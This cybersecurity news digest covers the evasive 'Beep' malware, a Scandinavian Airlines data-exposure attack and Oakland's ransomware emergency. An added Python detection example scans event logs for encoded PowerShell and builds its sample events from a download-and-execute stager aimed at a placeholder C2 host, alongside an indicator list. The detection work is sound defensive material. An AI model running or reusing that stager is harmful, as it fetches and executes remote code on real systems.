At a glance.
- New malware is “beeping” good at evading detection.
- Scandinavian Airlines cyberattack leads to customer data leak.
- Oakland update.
New malware is “beeping” good at evading detection.
A newly discovered malware dubbed “Beep” is getting attention for its advanced detection-evasion methods. Minerva Labs researcher Natalie Zargarov explains, "It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find. One such technique involved delaying execution through the use of the Beep API function, hence the malware's name." As The Hacker News reports, the malware uses a dropper to create a new Windows Registry key and execute a Base64-encoded PowerShell script. That script communicates with a remote server to retrieve an injector that launches the payload, an information stealer designed to download system information and enumerate running processes.
The malware uses numerous tactics to resist analysis, avoid sandboxes, and delay execution. "The malware tries to hide itself by dropping many unused, invalid files and stores important data between several MB of unimportant data, and also utilizes legitimate applications to perform its execution," the researchers explain. Beep is delivered via spam email attachments, Discord, or OneDrive URLs, and is likely being offered as a service to cybercriminals seeking a way to distribute their own payloads. Researchers found a number of features within the malware that have not yet been implemented, indicating that Beep will likely be further developed in the future.
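The delivery chain described above (a dropper writing a registry key and launching a Base64-encoded PowerShell script) leaves a recognisable trace in process-creation and registry-write telemetry. The following is an added detection example written for this page; it is not code from Minerva Labs, The Hacker News, or the Beep sample itself. It assumes Sysmon-style key=value event lines, which are constructed inline, decodes any `-EncodedCommand` blob the way PowerShell does (UTF-16LE then Base64), and flags PowerShell written to a Run/RunOnce key.

```python
"""Spot Base64-encoded PowerShell launches and Run-key persistence in
process-creation / registry event lines. Added defensive example; the
event lines below are constructed, not taken from the Beep report."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...)
# plus the documented -ec shorthand, so match all of them, longest first.
_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENC_RE = re.compile(rf"-(?:{_PREFIXES}|ec)\s+([A-Za-z0-9+/=]{{16,}})", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b|\bpwsh(?:\.exe)?\b", re.I)

# Strings whose presence in a decoded script is worth an analyst's attention.
INDICATORS = ("net.webclient", "downloadstring", "downloadfile",
              "invoke-webrequest", "invoke-expression", "iex",
              "frombase64string", "start-sleep")


def encode_ps(script: str) -> str:
    """Encode a script as PowerShell's -EncodedCommand expects (UTF-16LE + Base64).
    Used here only to build the constructed sample lines."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(b64: str):
    """Reverse of encode_ps; returns None when the blob is not valid encoded PowerShell."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_line(line: str) -> dict:
    """Return {'reasons': [...], 'decoded': str or None} for one event line."""
    reasons, decoded = [], None
    m = ENC_RE.search(line)
    if m:
        decoded = decode_ps(m.group(1))
        if decoded is None:
            reasons.append("encoded-command flag with undecodable payload")
        else:
            reasons.append("encoded PowerShell command line")
            low = decoded.lower()
            reasons += [f"decoded script contains '{ind}'" for ind in INDICATORS if ind in low]
    if RUN_KEY_RE.search(line) and POWERSHELL_RE.search(line):
        reasons.append("PowerShell written to a Run/RunOnce persistence key")
    return {"reasons": reasons, "decoded": decoded}


def scan(lines):
    """Return (line_index, analysis) for every line that produced at least one reason."""
    out = []
    for i, line in enumerate(lines):
        res = analyze_line(line)
        if res["reasons"]:
            out.append((i, res))
    return out


# Constructed sample events in a Sysmon-like key=value layout (hypothetical host, paths, URL).
STAGER = "(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s') | IEX"
SAMPLE_LINES = [
    'EventType=ProcessCreate Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell.exe -NoProfile -Command Get-Process"',
    'EventType=ProcessCreate ParentImage=C:\\Users\\a\\AppData\\Local\\Temp\\drop.exe '
    f'CommandLine="powershell.exe -NoP -W Hidden -EncodedCommand {encode_ps(STAGER)}"',
    'EventType=SetValue TargetObject=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater '
    f'Details=powershell.exe -w hidden -enc {encode_ps(STAGER)}',
    f'EventType=ProcessCreate CommandLine="powershell.exe -ec {encode_ps("Get-Date")}"',
    'EventType=ProcessCreate CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\ok.ps1"',
]

if __name__ == "__main__":
    for idx, res in scan(SAMPLE_LINES):
        print(f"line {idx}: " + "; ".join(res["reasons"]))
```

The encoded-but-harmless `Get-Date` line is still reported, with a single reason, so that an analyst can decide whether encoded launches are normal in their environment; the `-ExecutionPolicy` line shows that the prefix matching does not misfire on other `-E…` switches.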
Scandinavian Airlines cyberattack leads to customer data leak.
Scandinavian Airlines (SAS) on Tuesday disclosed it suffered a cyberattack that shut down the company’s website for several hours and resulted in the inadvertent exposure of customer data. The Copenhagen Post reports that a number of SAS app users took to social media to let SAS know they suddenly had access to data from other customers’ app accounts. The airline, which is the flag carrier of Denmark, Norway, and Sweden, notified customers on Tuesday evening that the site was experiencing issues and urged them not to use the app. A few hours later SAS announced it had resolved the issues. Karin Nyman, head of press at SAS, was hesitant to share further details. “We aren’t able to say a lot more right now as we are right in the attack right now,” she stated. Skift notes that several other Swedish companies experienced cyberattacks on Tuesday, including TV station Sveriges Television, which was hit by hacker group Anonymous Sudan in protest of Danish-Swedish far-right politician Rasmus Paludan’s recent burning of Qurans.
Update on Oakland's ransomware incident.
The city of Oakland, California, has declared a state of emergency over its own ransomware attack. The city announced Wednesday that “Interim City Administrator, G. Harold Duffey issued a local state of emergency due to the ongoing impacts of the network outages resulting from the ransomware attack that began on Wednesday, February 8. Oakland continues to experience a network outage that has left several non-emergency systems including phone lines within the City of Oakland impacted or offline.” The city appeals for patience and cooperation, and says it’s taking steps to get the help it needs to recover.
Erfan Shadabi, cybersecurity expert with comforte AG, commented on the increasing likelihood of ransomware attacks on governments. “The ransomware incident affecting the City of Oakland underscores a harsh reality that every governmental agency must confront: a ransomware attack isn’t just a remote possibility but rather a likely imminent event. The major objectives of the threat actors behind these attacks are to be able to halt operations, encrypt crucial operational data, and generally cause havoc in the provision of governmental services." He offered some advice for agencies as they prepare for this eventuality. "A better course of action other than relying on paying a ransom is to prepare for this eventuality with the following steps:
- "Back up your data regularly: Make sure you have a backup of all your important data and files on a separate device or cloud storage. Regularly backing up your data can help you recover quickly in case of a ransomware attack.
- "Train your employees on ransomware prevention: Educate your employees on how to identify and prevent ransomware attacks. This can include warning them about suspicious emails, not clicking on unknown links, and not downloading or installing unauthorized software.
- "And make sure to use data-centric security methods such as tokenization and format-preserving encryption that protect the data itself rather than the environment around it. Even if hackers get their hands on data, they can’t blackmail organizations with the threat of imminent release of that data. And that’s what ransomware is all about—blackmail. Don’t let that happen to your organization. Accept the eventuality and prepare accordingly.”
Chris Clements, VP of solutions architecture at Cerberus Sentinel, notes the challenges that municipal governments in particular face with respect to ransomware:
“Municipalities, even larger ones, often struggle to defend themselves from cybercriminals. Government in general tends to be slower to respond to a rapidly evolving threat landscape, and often lacks the budget, tools, and talent to mount a credible cybersecurity defense, making them easy targets for cybercriminals. Combined with their ability to pay large ransom demands, this makes municipalities favorite targets for cybercriminals.
"To remain safe against modern threat actors, municipalities must adopt a true culture of cybersecurity that goes beyond simply buying the latest cybersecurity product that promises to be a silver bullet. An effective cybersecurity culture must start from first principles and account for all aspects, including proactive system and application hardening, attack surface minimization, continuous monitoring that could indicate the presence of an attacker, and regular vulnerability scanning and penetration testing to validate that no gaps or mistakes have been made that expose the organization to risk. Education is also a key component of cybersecurity programs. Statistics indicate that the overwhelming majority of cybersecurity incidents stem from social engineering attacks like phishing, and while achieving and maintaining 100% personnel resilience is never possible, training can make a meaningful difference in preventing successful attacks.”
Dror Liwer, co-founder of Coro, draws attention to the preeminent attack vector. “The majority of ransomware attacks start with an email. All it takes is one untrained or distracted employee to click on a link or open an attachment, which is why priority must be placed on implementing modern cybersecurity solutions and on conducting frequent training and simulations with the staff.”
(Added, 7:00 PM ET, February 16th, 2023. Sean McNee, VP of Research at DomainTools, deplores the criminals' target selection. Whatever they are, they aren't Robin Hoods. “It is extremely frustrating to see bad actors targeting infrastructure critical to people’s lives, such as hospitals, higher education, and, in this case, local government," McNee said. "These institutions exist for the betterment of the people, so when they are interrupted people suffer. Getting operations back up and running quickly becomes top priority, and could unfortunately mean having to pay the ransomware authors. This tension is why local governments are attractive to bad actors. Paying the ransom and/or recovering from the attack diverts critical resources from government budgets which should be used to improve their constituents’ lives.”)
(Added, 12:00 noon ET, February 17th, 2023. James Graham, VP, RiskLens, sees the incident as affording a case study in the consequences of increased interconnectivity. “This attack is a prime example of how the interconnectivity of systems and networks throughout cities significantly increases the risk to which they are exposed. Any downtime to emergency or essential services due to a cyber attack is surely dire not only to finances and reputation, but also to human life," Graham wrote. And the episode shows that ransomware is no longer just about data availability. "Ransomware is no longer limited to an IT event; it affects entire organizations, sectors and stakeholders. As such, all businesses must understand the cost-benefit ratio of the probable impacts of these attacks, from business interruption to “pay vs. not-pay” on ransomware – well in advance of an attack. That requires a systematic, quantitative risk analysis in financial terms, based on solid data and rigorous, defensible modeling. With a quantified view of cyber risk in mind, public-sector organizations can not only better prioritize what protections to implement, but also understand how their level of cyber risk might be affected by those decisions.”)